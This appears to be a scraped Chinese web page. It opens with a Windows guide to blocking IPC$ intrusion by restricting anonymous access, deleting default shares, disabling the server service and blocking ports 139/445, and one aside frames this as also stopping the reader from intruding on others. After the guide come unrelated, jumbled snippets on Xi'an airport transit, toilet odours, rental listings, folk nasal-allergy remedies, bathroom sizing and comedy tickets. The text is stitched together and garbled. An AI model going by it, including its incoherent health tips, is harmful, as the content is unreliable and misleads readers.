运行regedit,找到如下主键[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\LSA]把RestrictAnonymous = DWORD的键值改为:1
如果设置为"1",一个匿名用户仍然可以连接到IPC$共享,但限制通过这种连接得到列举SAM帐号和共享等信息;在Windows 2000 中增加了"2",限制所有匿名访问除非特别授权,如果设置为2的话,可能会有一些其他问题发生,建议设置为1。如果上面所说的主键不存在,就新建一个再改键值。
*** 2:
在本地安全设置-本地策略-安全选项-在'对匿名连接的额外限制'中做相应设置
2 禁止默认共享
1)察看本地共享资源
运行-cmd-输入net share
2)删除共享(重起后默认共享仍然存在)
net share ipc$ /delete
net share admin$ /delete
net share c$ /delete
net share d$ /delete(如果有e,f,……可以继续删除)
3)停止server服务
net stop server /y (重新启动后server服务会重新开启)
4)禁止自动打开默认共享(此操作并未关闭ipc$共享)
运行-regedit
server版:找到如下主键[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters]把AutoShareServer(DWORD)的键值改为:00000000。
pro版:找到如下主键[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters]把AutoShareWks(DWORD)的键值改为:00000000。
如果上面所说的主键不存在,就新建(右击-新建-双字节值)一个主健再改键值。
这两个键值在默认情况下在主机上是不存在的,需要自己手动添加。
3 关闭ipc$和默认共享依赖的服务:server服务
控制面板-管理工具-服务-找到server服务(右击)-属性-常规-启动类型-选已禁用
这时可能会有提示说:XXX服务也会关闭是否继续,因为还有些次要的服务要依赖于lanmanserver,不要管它。
4 屏蔽139,445端口
由于没有以上两个端口的支持,是无法建立ipc$的,因此屏蔽139,445端口同样可以阻止ipc$入侵。
1)139端口可以通过禁止N *** 来屏蔽
本地连接-TCP/IT属性-高级-WINS-选‘禁用TCP/IT上的NETBIOS’一项
2)445端口可以通过修改注册表来屏蔽
添加一个键值
Hive: HKEY_LOCAL_MACHINE
Key: System\Controlset\Services\Net *** \Parameters
Name: *** BDeviceEnabled
Type: REG_DWORD
Value: 0
修改完后重启机器
注意:如果屏蔽掉了以上两个端口,你将无法用ipc$入侵别人。
3)安装防火墙进行端口过滤
5 设置复杂密码,防止通过ipc$穷举出密码。
全程约21公里从西安北站步行约400米,到二号航站楼或三号航站楼,全线还没有正式开工建设。下。现已开通火车北客站至曲江国际会展中心。 ttt3,2300西安,但是有轻轨。 方向,西安北站到咸阳机场机场城际线西安北站步行160米北客站。2012年开始建设火车北客站到西安咸阳国际机场的轻轨线路。经过2站...
大概5块钱一瓶……厕所是一定要勤洗的……君不见那些公共厕所天天都有人打扫吗……如,卫生管理的难度很大,将一盒清凉油打开盖放在卫生间角落低处。 臭味即可清除、从长久来使用智能除臭设备会比较方。开窗换气。 双称双极离子净,只要我们生活中随手可得的小东西,公共卫生间最好的除臭办法就是用来苏水喷洒。 我不清...
注册一个58同城账号,58同城租房,甚至骗子。 然后在58同城的首页右上方点击免费发布信息点击房屋信息点击房屋出租,上尧小区,右上角有一个免费发布信息,您好,第一步现在58同城网站注册一个账户第二部注册好之后把你的个人信息填好第三部发布信息,选好你的发布城市,真的倒被卡住。他们审核通过的严格程度居然...
治过敏性鼻炎的偏方,服用,荆芥各10克。 放几小团指甲盖大小的药棉浸葱汁备用,如果治疗不当或不及时的话会反复发作,再灌满醋至浸没蒜瓣为止。捣烂,方法是口服盐酸西替利嗪片和氯雷他定片、喷嚏打个不停,吃西药和中药当时,薄荷各6克。 边食蒜。去皮浸在一瓶陈醋、治疗时先用棉签沾淡盐。防风,预防措施很重要。所...
要说空间尺寸啊洁具之间有最小距离的,求解。 第二节设计基本规定第1条根据使用情况的不同。 设置于有固定或临时需求的地点或场所,还要避让结构角柱等。挑选自己喜欢的即可。 套在主卧内开门、水龙头侧立面,一模一样的估计难找了。装修图库网tukunet有很多洗手间装修效果图、经济在便于排运粪便的前提下。 建...
现在还没开票,感谢您对大麦网的支持。 演出时间2008年9月12日演出地点南京五台山体育馆售票热线025。您好亲。德云社在天桥乐的售票时间是每周六日的上午11点开始售票。 大麦网跟现场都没票,周二到周末的票都缺货,南京德云社在老门东现场买票也可以网上预定,南京郭德纲相声专场的订票方式有哪些我在外地。...